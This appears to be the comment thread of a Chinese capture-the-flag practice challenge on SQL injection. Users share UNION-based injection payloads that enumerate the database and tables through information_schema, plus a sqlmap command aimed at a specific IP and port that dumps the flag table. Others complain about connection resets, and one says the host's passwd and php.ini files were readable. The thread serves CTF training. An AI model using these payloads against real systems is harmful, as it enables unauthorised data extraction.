1'报错 1"不报错,所以使用'
查询数据表
-1' union select 1,database(),group_concat(table_name),4 from information_schema.tables where table_schema=database()#
sc
fl4g
查询表的字段名
-1' union select 1,databa
首先爆库名:通过id=-1' union select 1,2,3,database()#得到数据库名字skctf_flag;
然后爆表:通过使用 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名:fl4g,sc
评论
EtHat 5月前
举报
sqlmap一把梭哈
blackjack009 5月前
举报
python sqlmap.py -u http://114.67.175.224:11724/index.php --random-agent --dbms mysql --data="id=1" -p id -v 6 -T fl4g --dump
18946551925 5月前
举报
为什么一注入就连接已重置啊??????烦死了,差哪呢?
xiaohaisec 6月前
举报
1'报错 1"不报错,所以使用' 查询数据表 -1' union select 1,database(),group_concat(table_name),4 from information_schema.tables where table_schema=database()# sc fl4g 查询表的字段名 -1' union select 1,databa
n0pass 7月前
举报
启动环境以后网页打不开啊。。。。。。退钱
harry 管理员 7月前
举报
已修复,金币退了
老渡真的不懂 8月前
举报
环境有点问题,有时能用有时不能用。试了一下passwd,group,php.ini能看,像我这样的菜鸟也就看看,做不了什么,大神恐怕随随便便就能破坏环境,感觉权限给高了。环境总出问题不会是大佬进去搞破坏了吧?
samRsa 8月前
举报
这题也太简单了
逐月 8月前
举报
一尝试注入就链接被重置,我真的被气得头疼
逐月 8月前
举报
烦死了烦死了一sql注入就页面一直转,然后链接被中断,这是在干什么。。
ls666 8月前
举报
首先爆库名:通过id=-1' union select 1,2,3,database()#得到数据库名字skctf_flag; 然后爆表:通过使用 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名:fl4g,sc
xiashuidao 7月前
举报
id=-1‘ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()-- -